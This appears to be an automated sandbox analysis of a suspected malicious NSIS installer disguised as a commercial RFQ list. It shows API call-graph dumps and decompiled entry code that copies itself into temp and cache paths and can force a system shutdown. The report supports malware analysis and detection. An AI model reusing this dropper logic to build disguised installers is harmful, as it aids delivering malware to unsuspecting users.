2 API calls 4406->4407 4475 10001215 GlobalAlloc 4406->4475 4407->4406 4408->4393 4418 10002212 4409->4418 4410 10001224 GlobalAlloc lstrcpynA 4410->4418 4412 10002349 GlobalFree 4415 10001712 4412->4415 4412->4418 4413 100022b9 GlobalAlloc MultiByteToWideChar 4416 10002303 4413->4416 4417 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4413->4417 4414 1000230a lstrlenA 4414->4412 4414->4416 4415->4345 4415->4346 4415->4359 4416->4412 4483 1000251d 4416->4483 4417->4412 4418->4410 4418->4412 4418->4413 4418->4414 4479 100012ad 4418->4479 4422 100027fa 4420->4422 4421 1000289f ReadFile 4423 100028bd 4421->4423 4422->4421 4424 100029b9 4423->4424 4425 100029ae GetLastError 4423->4425 4424->4359 4425->4424 4427 100021c0 4426->4427 4428 1000170b 4426->4428 4427->4428 4429 100021d2 GlobalAlloc 4427->4429 4428->4338 4429->4427 4434 100025a5 4430->4434 4431 100025f6 GlobalAlloc 4435 10002618 4431->4435 4432 10002609 4433 1000260e GlobalSize 4432->4433 4432->4435 4433->4435 4434->4431 4434->4432 4435->4363 4438 10002aae 4436->4438 4437 10002aee GlobalFree 4438->4437 4486 10001215 GlobalAlloc 4439->4486 4441 1000243a lstrcpynA 4447 100023e6 4441->4447 4442 1000244b StringFromGUID2 WideCharToMultiByte 4442->4447 4443 1000246f WideCharToMultiByte 4443->4447 4444 10002490 wsprintfA 4444->4447 4445 100024b4 GlobalFree 4445->4447 4446 100024ee GlobalFree 4446->4353 4447->4441 4447->4442 4447->4443 4447->4444 4447->4445 4447->4446 4448 10001266 2 API calls 4447->4448 4487 100012d1 4447->4487 4448->4447 4491 10001215 GlobalAlloc 4450->4491 4452 1000155f 4453 1000156c lstrcpyA 4452->4453 4455 10001586 4452->4455 4456 100015a0 4453->4456 4455->4456 4457 1000158b wsprintfA 4455->4457 4458 10001266 4456->4458 4457->4456 4459 100012a8 GlobalFree 4458->4459 4460 1000126f GlobalAlloc lstrcpynA 4458->4460 4459->4357 4460->4459 4462 100017c5 4461->4462 4463 100023ae 4461->4463 4462->4371 4462->4372 4463->4462 4464 100023c7 GlobalFree 4463->4464 4464->4463 4466 10001266 2 API calls 4465->4466 4467 10001503 4466->4467 4467->4365 4468->4379 4469->4406 4471 10001552 4470->4471 4471->4402 4478 10001215 GlobalAlloc 4472->4478 4474 10001233 lstrcpynA 4474->4401 4475->4406 4476->4397 4477->4404 4478->4474 4480 100012b4 4479->4480 4481 10001224 2 API calls 4480->4481 4482 100012cf 4481->4482 4482->4418 4484 10002581 4483->4484 4485 1000252b VirtualAlloc 4483->4485 4484->4416 4485->4484 4486->4447 4488 100012f9 4487->4488 4489 100012da 4487->4489 4488->4447 4489->4488 4490 100012e0 lstrcpyA 4489->4490 4490->4488 4491->4452 5107 401490 5108 404f48 25 API calls 5107->5108 5109 401497 5108->5109 5110 401595 5111 402a3a 18 API calls 5110->5111 5112 40159c SetFileAttributesA 5111->5112 5113 4015ae 5112->5113 4569 402616 4570 40261d 4569->4570 4571 40287c 4569->4571 4572 402a1d 18 API calls 4570->4572 4573 402628 4572->4573 4574 40262f SetFilePointer 4573->4574 4574->4571 4575 40263f 4574->4575 4577 405c8d wsprintfA 4575->4577 4577->4571 5114 401717 5115 402a3a 18 API calls 5114->5115 5116 40171e SearchPathA 5115->5116 5117 401739 5116->5117 5118 10001058 5120 10001074 5118->5120 5119 100010dc 5120->5119 5121 100014bb GlobalFree 5120->5121 5122 10001091 5120->5122 5121->5122 5123 100014bb GlobalFree 5122->5123 5124 100010a1 5123->5124 5125 100010b1 5124->5125 5126 100010a8 GlobalSize 5124->5126 5127 100010b5 GlobalAlloc 5125->5127 5128 100010c6 5125->5128 5126->5125 5129 100014e2 3 API calls 5127->5129 5130 100010d1 GlobalFree 5128->5130 5129->5128 5130->5119 5131 402519 5132 40252e 5131->5132 5133 40251e 5131->5133 5135 402a3a 18 API calls 5132->5135 5134 402a1d 18 API calls 5133->5134 5137 402527 5134->5137 5136 402535 lstrlenA 5135->5136 5136->5137 5138 405a49 WriteFile 5137->5138 5139 402557 5137->5139 5138->5139 5140 40149d 5141 4014ab PostQuitMessage 5140->5141 5142 40226e 5140->5142 5141->5142 5143 100010e0 5145 1000110e 5143->5145 5144 100011c4 GlobalFree 5145->5144 5146 100012ad 2 API calls 5145->5146 5147 100011c3 5145->5147 5148 10001266 2 API calls 5145->5148 5149 10001155 GlobalAlloc 5145->5149 5150 100011ea GlobalFree 5145->5150 5151 100012d1 lstrcpyA 5145->5151 5152 100011b1 GlobalFree 5145->5152 5146->5145 5147->5144 5148->5152 5149->5145 5150->5145 5151->5145 5152->5145 5153 10002162 5154 100021c0 5153->5154 5155 100021f6 5153->5155 5154->5155 5156 100021d2 GlobalAlloc 5154->5156 5156->5154 5157 4046a3 5158 4046b3 5157->5158 5159 4046cf 5157->5159 5168 405509 GetDlgItemTextA 5158->5168 5161 404702 5159->5161 5162 4046d5 SHGetPathFromIDListA 5159->5162 5164 4046e5 5162->5164 5167 4046ec SendMessageA 5162->5167 5163 4046c0 SendMessageA 5163->5159 5166 40140b 2 API calls 5164->5166 5166->5167 5167->5161 5168->5163 5169 401ca7 5170 402a1d 18 API calls 5169->5170 5171 401cae 5170->5171 5172 402a1d 18 API calls 5171->5172 5173 401cb6 GetDlgItem 5172->5173 5174 402513 5173->5174 5175 404028 lstrcpynA lstrlenA 3921 40192a 3922 40192c 3921->3922 3923 402a3a 18 API calls 3922->3923 3924 401931 3923->3924 3927 4055d1 3924->3927 3967 40588f 3927->3967 3930 405610 3933 405748 3930->3933 3981 405d2f lstrcpynA 3930->3981 3931 4055f9 DeleteFileA 3932 40193a 3931->3932 3933->3932 3999 406033 FindFirstFileA 3933->3999 3935 405636 3936 405649 3935->3936 3937 40563c lstrcatA 3935->3937 3982 4057e8 lstrlenA 3936->3982 3939 40564f 3937->3939 3942 40565d lstrcatA 3939->3942 3943 405668 lstrlenA FindFirstFileA 3939->3943 3942->3943 3945 40573e 3943->3945 3963 40568c 3943->3963 3944 405766 4002 4057a1 lstrlenA CharPrevA 3944->4002 3945->3933 3947 4057cc CharNextA 3947->3963 3949 405589 5 API calls 3950 405778 3949->3950 3951 405792 3950->3951 3952 40577c 3950->3952 3953 404f48 25 API calls 3951->3953 3952->3932 3957 404f48 25 API calls 3952->3957 3953->3932 3954 40571d FindNextFileA 3956 405735 FindClose 3954->3956 3954->3963 3956->3945 3958 405789 3957->3958 3959 405bea 38 API calls 3958->3959 3961 405790 3959->3961 3961->3932 3962 4055d1 62 API calls 3962->3963 3963->3947 3963->3954 3963->3962 3964 404f48 25 API calls 3963->3964 3965 404f48 25 API calls 3963->3965 3986 405d2f lstrcpynA 3963->3986 3987 405589 3963->3987 3995 405bea MoveFileExA 3963->3995 3964->3954 3965->3963 4005 405d2f lstrcpynA 3967->4005 3969 4058a0 4006 40583a CharNextA CharNextA 3969->4006 3972 4055f1 3972->3930 3972->3931 3973 405f9a 5 API calls 3976 4058b6 3973->3976 3974 4058e1 lstrlenA 3975 4058ec 3974->3975 3974->3976 3978 4057a1 3 API calls 3975->3978 3976->3972 3976->3974 3977 406033 2 API calls 3976->3977 3980 4057e8 2 API calls 3976->3980 3977->3976 3979 4058f1 GetFileAttributesA 3978->3979 3979->3972 3980->3974 3981->3935 3983 4057f5 3982->3983 3984 405806 3983->3984 3985 4057fa CharPrevA 3983->3985 3984->3939 3985->3983 3985->3984 3986->3963 4012 40597d GetFileAttributesA 3987->4012 3990 4055b6 3990->3963 3991 4055a4 RemoveDirectoryA 3993 4055b2 3991->3993 3992 4055ac DeleteFileA 3992->3993 3993->3990 3994 4055c2 SetFileAttributesA 3993->3994 3994->3990 3996 405c0b 3995->3996 3997 405bfe 3995->3997 3996->3963 4015 405a78 lstrcpyA 3997->4015 4000 405762 3999->4000 4001 406049 FindClose 3999->4001 4000->3932 4000->3944 4001->4000 4003 40576c 4002->4003 4004 4057bb lstrcatA 4002->4004 4003->3949 4004->4003 4005->3969 4007 405865 4006->4007 4008 405855 4006->4008 4009 405885 4007->4009 4011 4057cc CharNextA 4007->4011 4008->4007 4010 405860 CharNextA 4008->4010 4009->3972 4009->3973 4010->4009 4011->4007 4013 405595 4012->4013 4014 40598f SetFileAttributesA 4012->4014 4013->3990 4013->3991 4013->3992 4014->4013 4016 405aa0 4015->4016 4017 405ac6 GetShortPathNameA 4015->4017 4042 4059a2 GetFileAttributesA CreateFileA 4016->4042 4018 405be5 4017->4018 4019 405adb 4017->4019 4018->3996 4019->4018 4022 405ae3 wsprintfA 4019->4022 4021 405aaa CloseHandle GetShortPathNameA 4021->4018 4023 405abe 4021->4023 4024 405d51 18 API calls 4022->4024 4023->4017 4023->4018 4025 405b0b 4024->4025 4043 4059a2 GetFileAttributesA CreateFileA 4025->4043 4027 405b18 4027->4018 4028 405b27 GetFileSize GlobalAlloc 4027->4028 4029 405b49 4028->4029 4030 405bde CloseHandle 4028->4030 4031 405a1a ReadFile 4029->4031 4030->4018 4032 405b51 4031->4032 4032->4030 4044 405907 lstrlenA 4032->4044 4035 405b68 lstrcpyA 4039 405b8a 4035->4039 4036 405b7c 4037 405907 4 API calls 4036->4037 4037->4039 4038 405bc1 SetFilePointer 4040 405a49 WriteFile 4038->4040 4039->4038 4041 405bd7 GlobalFree 4040->4041 4041->4030 4042->4021 4043->4027 4045 405948 lstrlenA 4044->4045 4046 405950 4045->4046 4047 405921 lstrcmpiA 4045->4047 4046->4035 4046->4036 4047->4046 4048 40593f CharNextA 4047->4048 4048->4045 5176 4028aa SendMessageA 5177 4028c4 InvalidateRect 5176->5177 5178 4028cf 5176->5178 5177->5178 4549 4015b3 4550 402a3a 18 API calls 4549->4550 4551 4015ba 4550->4551 4552 40583a 4 API calls 4551->4552 4565 4015c2 4552->4565 4553 40161c 4555 401621 4553->4555 4556 40164a 4553->4556 4554 4057cc CharNextA 4554->4565 4557 401423 25 API calls 4555->4557 4558 401423 25 API calls 4556->4558 4559 401628 4557->4559 4562 401642 4558->4562 4568 405d2f lstrcpynA 4559->4568 4560 40548b 2 API calls 4560->4565 4563 4054a8 5 API calls 4563->4565 4564 401633 SetCurrentDirectoryA 4564->4562 4565->4553 4565->4554 4565->4560 4565->4563 4566 401604 GetFileAttributesA 4565->4566 4567 40540e 4 API calls 4565->4567 4566->4565 4567->4565 4568->4564 5179 4016b3 5180 402a3a 18 API calls 5179->5180 5181 4016b9 GetFullPathNameA 5180->5181 5182 4016f1 5181->5182 5183 4016d0 5181->5183 5184 401705 GetShortPathNameA 5182->5184 5185 4028cf 5182->5185 5183->5182 5186 406033 2 API calls 5183->5186 5184->5185 5187 4016e1 5186->5187 5187->5182 5189 405d2f lstrcpynA 5187->5189 5189->5182 5190 4014b7 5191 4014bd 5190->5191 5192 401389 2 API calls 5191->5192 5193 4014c5 5192->5193 5194 401d38 GetDC GetDeviceCaps 5195 402a1d 18 API calls 5194->5195 5196 401d56 MulDiv ReleaseDC 5195->5196 5197 402a1d 18 API calls 5196->5197 5198 401d75 5197->5198 5199 405d51 18 API calls 5198->5199 5200 401dae CreateFontIndirectA 5199->5200 5201 402513 5200->5201 5202 404ebc 5203 404ee0 5202->5203 5204 404ecc 5202->5204 5206 404ee8 IsWindowVisible 5203->5206 5210 404eff 5203->5210 5205 404ed2 5204->5205 5214 404f29 5204->5214 5208 403f60 SendMessageA 5205->5208 5209 404ef5 5206->5209 5206->5214 5207 404f2e CallWindowProcA 5211 404edc 5207->5211 5208->5211 5212 404813 5 API calls 5209->5212 5210->5207 5213 404893 4 API calls 5210->5213 5212->5210 5213->5214 5214->5207 4588 40173e 4589 402a3a 18 API calls 4588->4589 4590 401745 4589->4590 4591 4059d1 2 API calls 4590->4591 4592 40174c 4591->4592 4593 4059d1 2 API calls 4592->4593 4593->4592 5215 401ebe 5216 402a3a 18 API calls 5215->5216 5217 401ec5 5216->5217 5218 406033 2 API calls 5217->5218 5219 401ecb 5218->5219 5221 401edd 5219->5221 5222 405c8d wsprintfA 5219->5222 5222->5221 5223 40193f 5224 402a3a 18 API calls 5223->5224 5225 401946 lstrlenA 5224->5225 5226 402513 5225->5226

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 0040310F Relevance: 94.9, APIs: 33, Strings: 21, Instructions: 357stringcomfileCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 0 40310f-403144 SetErrorMode GetVersion 1 403146-40314e call 4060c8 0->1 2 403157 0->2 1->2 7 403150 1->7 4 40315c-40316f call 40605a lstrlenA 2->4 9 403171-4031e4 call 4060c8 * 2 #17 OleInitialize SHGetFileInfoA call 405d2f GetCommandLineA call 405d2f GetModuleHandleA 4->9 7->2 18 4031f0-403205 call 4057cc CharNextA 9->18 19 4031e6-4031eb 9->19 22 4032ca-4032ce 18->22 19->18 23 4032d4 22->23 24 40320a-40320d 22->24 25 4032e7-403301 GetTempPathA call 4030de 23->25 26 403215-40321d 24->26 27 40320f-403213 24->27 36 403303-403321 GetWindowsDirectoryA lstrcatA call 4030de 25->36 37 403359-403373 DeleteFileA call 402c66 25->37 29 403225-403228 26->29 30 40321f-403220 26->30 27->26 27->27 31 4032ba-4032c7 call 4057cc 29->31 32 40322e-403232 29->32 30->29 31->22 51 4032c9 31->51 34 403234-40323a 32->34 35 40324a-403277 32->35 39 403240 34->39 40 40323c-40323e 34->40 41 403279-40327f 35->41 42 40328a-4032b8 35->42 36->37 53 403323-403353 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030de 36->53 54 403407-403417 call 4035d5 OleUninitialize 37->54 55 403379-40337f 37->55 39->35 40->35 40->39 46 403281-403283 41->46 47 403285 41->47 42->31 49 4032d6-4032e2 call 405d2f 42->49 46->42 46->47 47->42 49->25 51->22 53->37 53->54 66 40353b-403541 54->66 67 40341d-40342d call 405525 ExitProcess 54->67 58 403381-40338c call 4057cc 55->58 59 4033f7-4033fe call 4036af 55->59 68 4033c2-4033cc 58->68 69 40338e-4033b7 58->69 64 403403 59->64 64->54 71 403543-40355c GetCurrentProcess OpenProcessToken 66->71 72 4035bd-4035c5 66->72 76 403433-403447 call 4054a8 lstrcatA 68->76 77 4033ce-4033db call 40588f 68->77 73 4033b9-4033bb 69->73 79 40358e-40359c call 4060c8 71->79 80 40355e-403588 LookupPrivilegeValueA AdjustTokenPrivileges 71->80 74 4035c7 72->74 75 4035cb-4035cf ExitProcess 72->75 73->68 81 4033bd-4033c0 73->81 74->75 89 403454-40346e lstrcatA lstrcmpiA 76->89 90 403449-40344f lstrcatA 76->90 77->54 88 4033dd-4033f3 call 405d2f * 2 77->88 91 4035aa-4035b4 ExitWindowsEx 79->91 92 40359e-4035a8 79->92 80->79 81->68 81->73 88->59 89->54 95 403470-403473 89->95 90->89 91->72 93 4035b6-4035b8 call 40140b 91->93 92->91 92->93 93->72 99 403475-40347a call 40540e 95->99 100 40347c call 40548b 95->100 104 403481-40348e SetCurrentDirectoryA 99->104 100->104 107 403490-403496 call 405d2f 104->107 108 40349b-4034c3 call 405d2f 104->108 107->108 112 4034c9-4034e5 call 405d51 DeleteFileA 108->112 115 403526-40352d 112->115 116 4034e7-4034f7 CopyFileA 112->116 115->112 117 40352f-403536 call 405bea 115->117 116->115 118 4034f9-403519 call 405bea call 405d51 call 4054c0 116->118 117->54 118->115 127 40351b-403522 CloseHandle 118->127 127->115
                                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                                  			_entry_() {
				intOrPtr _t45;
				CHAR* _t49;
				char* _t52;
				CHAR* _t54;
				void* _t58;
				intOrPtr _t60;
				int _t62;
				int _t65;
				signed int _t66;
				int _t67;
				signed int _t69;
				void* _t93;
				signed int _t109;
				void* _t112;
				void* _t117;
				intOrPtr* _t118;
				char _t121;
				signed int _t140;
				signed int _t141;
				int _t149;
				void* _t150;
				intOrPtr* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t158;
				char* _t159;
				void* _t162;
				void* _t163;
				char _t185;

				 *(_t163 + 0x18) = 0;
				 *((intOrPtr*)(_t163 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t163 + 0x20) = 0;
				 *(_t163 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t118 = E004060C8(0);
					if(_t118 != 0) {
						 *_t118(0xc00);
					}
				}
				_t155 = "UXTHEME";
				do {
					E0040605A(_t155); // executed
					_t155 =  &(_t155[lstrlenA(_t155) + 1]);
				} while ( *_t155 != 0);
				E004060C8(9);
				_t45 = E004060C8(7);
				 *0x42e404 = _t45;
				__imp__#17(_t158);
				__imp__OleInitialize(0); // executed
				 *0x42e4b8 = _t45;
				SHGetFileInfoA(0x428828, 0, _t163 + 0x38, 0x160, 0); // executed
				E00405D2F("Baptistisk Setup", "NSIS Error");
				_t49 = GetCommandLineA();
				_t159 = "\"C:\\Users\\Arthur\\Desktop\\RFQINL0607_Commerical_list.exe\"";
				E00405D2F(_t159, _t49);
				 *0x42e400 = GetModuleHandleA(0);
				_t52 = _t159;
				if("\"C:\\Users\\Arthur\\Desktop\\RFQINL0607_Commerical_list.exe\"" == 0x22) {
					 *(_t163 + 0x14) = 0x22;
					_t52 =  &M00434001;
				}
				_t54 = CharNextA(E004057CC(_t52,  *(_t163 + 0x14)));
				 *(_t163 + 0x1c) = _t54;
				while(1) {
					_t121 =  *_t54;
					_t168 = _t121;
					if(_t121 == 0) {
						break;
					}
					__eflags = _t121 - 0x20;
					if(_t121 != 0x20) {
						L10:
						__eflags =  *_t54 - 0x22;
						 *(_t163 + 0x14) = 0x20;
						if( *_t54 == 0x22) {
							_t54 =  &(_t54[1]);
							__eflags = _t54;
							 *(_t163 + 0x14) = 0x22;
						}
						__eflags =  *_t54 - 0x2f;
						if( *_t54 != 0x2f) {
							L22:
							_t54 = E004057CC(_t54,  *(_t163 + 0x14));
							__eflags =  *_t54 - 0x22;
							if(__eflags == 0) {
								_t54 =  &(_t54[1]);
								__eflags = _t54;
							}
							continue;
						} else {
							_t54 =  &(_t54[1]);
							__eflags =  *_t54 - 0x53;
							if( *_t54 != 0x53) {
								L17:
								__eflags =  *_t54 - ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC");
								if( *_t54 != ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC")) {
									L21:
									__eflags =  *((intOrPtr*)(_t54 - 2)) - ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t54 - 2)) == ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=")) {
										 *((char*)(_t54 - 2)) = 0;
										__eflags =  &(_t54[2]);
										E00405D2F("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\sjoske\\Humlebier\\aesc",  &(_t54[2]));
										L27:
										_t156 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t156);
										_t58 = E004030DE(_t168);
										_t169 = _t58;
										if(_t58 != 0) {
											L30:
											DeleteFileA("1033"); // executed
											_t60 = E00402C66(_t171,  *(_t163 + 0x20)); // executed
											 *((intOrPtr*)(_t163 + 0x10)) = _t60;
											if(_t60 != 0) {
												L40:
												E004035D5();
												__imp__OleUninitialize();
												_t181 =  *((intOrPtr*)(_t163 + 0x10));
												if( *((intOrPtr*)(_t163 + 0x10)) == 0) {
													__eflags =  *0x42e494;
													if( *0x42e494 == 0) {
														L64:
														_t62 =  *0x42e4ac;
														__eflags = _t62 - 0xffffffff;
														if(_t62 != 0xffffffff) {
															 *(_t163 + 0x14) = _t62;
														}
														ExitProcess( *(_t163 + 0x14));
													}
													_t65 = OpenProcessToken(GetCurrentProcess(), 0x28, _t163 + 0x18);
													__eflags = _t65;
													_t149 = 2;
													if(_t65 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t163 + 0x24);
														 *(_t163 + 0x38) = 1;
														 *(_t163 + 0x44) = _t149;
														AdjustTokenPrivileges( *(_t163 + 0x2c), 0, _t163 + 0x28, 0, 0, 0);
													}
													_t66 = E004060C8(4);
													__eflags = _t66;
													if(_t66 == 0) {
														L62:
														_t67 = ExitWindowsEx(_t149, 0x80040002);
														__eflags = _t67;
														if(_t67 != 0) {
															goto L64;
														}
														goto L63;
													} else {
														_t69 =  *_t66(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t69;
														if(_t69 == 0) {
															L63:
															E0040140B(9);
															goto L64;
														}
														goto L62;
													}
												}
												E00405525( *((intOrPtr*)(_t163 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42e41c == 0) {
												L39:
												 *0x42e4ac =  *0x42e4ac | 0xffffffff;
												 *(_t163 + 0x18) = E004036AF( *0x42e4ac);
												goto L40;
											}
											_t152 = E004057CC(_t159, 0);
											if(_t152 < _t159) {
												L36:
												_t178 = _t152 - _t159;
												 *((intOrPtr*)(_t163 + 0x10)) = "Error launching installer";
												if(_t152 < _t159) {
													_t150 = E004054A8(_t181);
													lstrcatA(_t156, "~nsu");
													if(_t150 != 0) {
														lstrcatA(_t156, "A");
													}
													lstrcatA(_t156, ".tmp");
													_t161 = "C:\\Users\\Arthur\\Desktop";
													if(lstrcmpiA(_t156, "C:\\Users\\Arthur\\Desktop") != 0) {
														_push(_t156);
														if(_t150 == 0) {
															E0040548B();
														} else {
															E0040540E();
														}
														SetCurrentDirectoryA(_t156);
														_t185 = "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\sjoske\\Humlebier\\aesc"; // 0x43
														if(_t185 == 0) {
															E00405D2F("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\sjoske\\Humlebier\\aesc", _t161);
														}
														E00405D2F("7580360",  *(_t163 + 0x1c));
														_t136 = "A";
														_t162 = 0x1a;
														do {
															E00405D51(0, 0x428428, _t156, 0x428428,  *((intOrPtr*)( *0x42e410 + 0x120)));
															DeleteFileA(0x428428);
															if( *((intOrPtr*)(_t163 + 0x10)) != 0 && CopyFileA("C:\\Users\\Arthur\\Desktop\\RFQINL0607_Commerical_list.exe", 0x428428, ?str?) != 0) {
																E00405BEA(_t136, 0x428428, 0);
																E00405D51(0, 0x428428, _t156, 0x428428,  *((intOrPtr*)( *0x42e410 + 0x124)));
																_t93 = E004054C0(0x428428);
																if(_t93 != 0) {
																	CloseHandle(_t93);
																	 *((intOrPtr*)(_t163 + 0x10)) = 0;
																}
															}
															"74383360" =  &("74383360"[1]);
															_t162 = _t162 - 1;
														} while (_t162 != 0);
														E00405BEA(_t136, _t156, 0);
													}
													goto L40;
												}
												 *_t152 = 0;
												_t153 = _t152 + 4;
												if(E0040588F(_t178, _t152 + 4) == 0) {
													goto L40;
												}
												E00405D2F("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\sjoske\\Humlebier\\aesc", _t153);
												E00405D2F("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\sjoske\\Humlebier\\aesc\\Antioxidanttilskud\\Pellicularia\\Unillusioned", _t153);
												 *((intOrPtr*)(_t163 + 0x10)) = 0;
												goto L39;
											}
											_t109 = (( *0x40915b << 0x00000008 |  *0x40915a) << 0x00000008 |  *0x409159) << 0x00000008 | " _?=";
											while( *_t152 != _t109) {
												_t152 = _t152 - 1;
												if(_t152 >= _t159) {
													continue;
												}
												goto L36;
											}
											goto L36;
										}
										GetWindowsDirectoryA(_t156, 0x3fb);
										lstrcatA(_t156, "\\Temp");
										_t112 = E004030DE(_t169);
										_t170 = _t112;
										if(_t112 != 0) {
											goto L30;
										}
										GetTempPathA(0x3fc, _t156);
										lstrcatA(_t156, "Low");
										SetEnvironmentVariableA("TEMP", _t156);
										SetEnvironmentVariableA("TMP", _t156);
										_t117 = E004030DE(_t170);
										_t171 = _t117;
										if(_t117 == 0) {
											goto L40;
										}
										goto L30;
									}
									goto L22;
								}
								_t140 = _t54[4];
								__eflags = _t140 - 0x20;
								if(_t140 == 0x20) {
									L20:
									_t15 = _t163 + 0x20;
									 *_t15 =  *(_t163 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L21;
								}
								__eflags = _t140;
								if(_t140 != 0) {
									goto L21;
								}
								goto L20;
							}
							_t141 = _t54[1];
							__eflags = _t141 - 0x20;
							if(_t141 == 0x20) {
								L16:
								 *0x42e4a0 = 1;
								goto L17;
							}
							__eflags = _t141;
							if(_t141 != 0) {
								goto L17;
							}
							goto L16;
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t54 =  &(_t54[1]);
						__eflags =  *_t54 - 0x20;
					} while ( *_t54 == 0x20);
					goto L10;
				}
				goto L27;
			}
































                                                                                                                                                                                  0x0040311f
                                                                                                                                                                                  0x00403123
                                                                                                                                                                                  0x0040312b
                                                                                                                                                                                  0x0040312f
                                                                                                                                                                                  0x00403134
                                                                                                                                                                                  0x00403144
                                                                                                                                                                                  0x00403147
                                                                                                                                                                                  0x0040314e
                                                                                                                                                                                  0x00403155
                                                                                                                                                                                  0x00403155
                                                                                                                                                                                  0x0040314e
                                                                                                                                                                                  0x00403157
                                                                                                                                                                                  0x0040315c
                                                                                                                                                                                  0x0040315d
                                                                                                                                                                                  0x00403169
                                                                                                                                                                                  0x0040316d
                                                                                                                                                                                  0x00403174
                                                                                                                                                                                  0x0040317b
                                                                                                                                                                                  0x00403180
                                                                                                                                                                                  0x00403185
                                                                                                                                                                                  0x0040318c
                                                                                                                                                                                  0x00403192
                                                                                                                                                                                  0x004031a8
                                                                                                                                                                                  0x004031b8
                                                                                                                                                                                  0x004031bd
                                                                                                                                                                                  0x004031c3
                                                                                                                                                                                  0x004031ca
                                                                                                                                                                                  0x004031dd
                                                                                                                                                                                  0x004031e2
                                                                                                                                                                                  0x004031e4
                                                                                                                                                                                  0x004031e6
                                                                                                                                                                                  0x004031eb
                                                                                                                                                                                  0x004031eb
                                                                                                                                                                                  0x004031fb
                                                                                                                                                                                  0x00403201
                                                                                                                                                                                  0x004032ca
                                                                                                                                                                                  0x004032ca
                                                                                                                                                                                  0x004032cc
                                                                                                                                                                                  0x004032ce
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040320a
                                                                                                                                                                                  0x0040320d
                                                                                                                                                                                  0x00403215
                                                                                                                                                                                  0x00403215
                                                                                                                                                                                  0x00403218
                                                                                                                                                                                  0x0040321d
                                                                                                                                                                                  0x0040321f
                                                                                                                                                                                  0x0040321f
                                                                                                                                                                                  0x00403220
                                                                                                                                                                                  0x00403220
                                                                                                                                                                                  0x00403225
                                                                                                                                                                                  0x00403228
                                                                                                                                                                                  0x004032ba
                                                                                                                                                                                  0x004032bf
                                                                                                                                                                                  0x004032c4
                                                                                                                                                                                  0x004032c7
                                                                                                                                                                                  0x004032c9
                                                                                                                                                                                  0x004032c9
                                                                                                                                                                                  0x004032c9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040322e
                                                                                                                                                                                  0x0040322e
                                                                                                                                                                                  0x0040322f
                                                                                                                                                                                  0x00403232
                                                                                                                                                                                  0x0040324a
                                                                                                                                                                                  0x00403275
                                                                                                                                                                                  0x00403277
                                                                                                                                                                                  0x0040328a
                                                                                                                                                                                  0x004032b5
                                                                                                                                                                                  0x004032b8
                                                                                                                                                                                  0x004032d6
                                                                                                                                                                                  0x004032d9
                                                                                                                                                                                  0x004032e2
                                                                                                                                                                                  0x004032e7
                                                                                                                                                                                  0x004032ed
                                                                                                                                                                                  0x004032f8
                                                                                                                                                                                  0x004032fa
                                                                                                                                                                                  0x004032ff
                                                                                                                                                                                  0x00403301
                                                                                                                                                                                  0x00403359
                                                                                                                                                                                  0x0040335e
                                                                                                                                                                                  0x00403368
                                                                                                                                                                                  0x0040336f
                                                                                                                                                                                  0x00403373
                                                                                                                                                                                  0x00403407
                                                                                                                                                                                  0x00403407
                                                                                                                                                                                  0x0040340c
                                                                                                                                                                                  0x00403412
                                                                                                                                                                                  0x00403417
                                                                                                                                                                                  0x0040353b
                                                                                                                                                                                  0x00403541
                                                                                                                                                                                  0x004035bd
                                                                                                                                                                                  0x004035bd
                                                                                                                                                                                  0x004035c2
                                                                                                                                                                                  0x004035c5
                                                                                                                                                                                  0x004035c7
                                                                                                                                                                                  0x004035c7
                                                                                                                                                                                  0x004035cf
                                                                                                                                                                                  0x004035cf
                                                                                                                                                                                  0x00403551
                                                                                                                                                                                  0x00403559
                                                                                                                                                                                  0x0040355b
                                                                                                                                                                                  0x0040355c
                                                                                                                                                                                  0x00403569
                                                                                                                                                                                  0x0040357c
                                                                                                                                                                                  0x00403584
                                                                                                                                                                                  0x00403588
                                                                                                                                                                                  0x00403588
                                                                                                                                                                                  0x00403590
                                                                                                                                                                                  0x00403595
                                                                                                                                                                                  0x0040359c
                                                                                                                                                                                  0x004035aa
                                                                                                                                                                                  0x004035ac
                                                                                                                                                                                  0x004035b2
                                                                                                                                                                                  0x004035b4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040359e
                                                                                                                                                                                  0x004035a4
                                                                                                                                                                                  0x004035a6
                                                                                                                                                                                  0x004035a8
                                                                                                                                                                                  0x004035b6
                                                                                                                                                                                  0x004035b8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004035b8
                                                                                                                                                                                  0x00000000
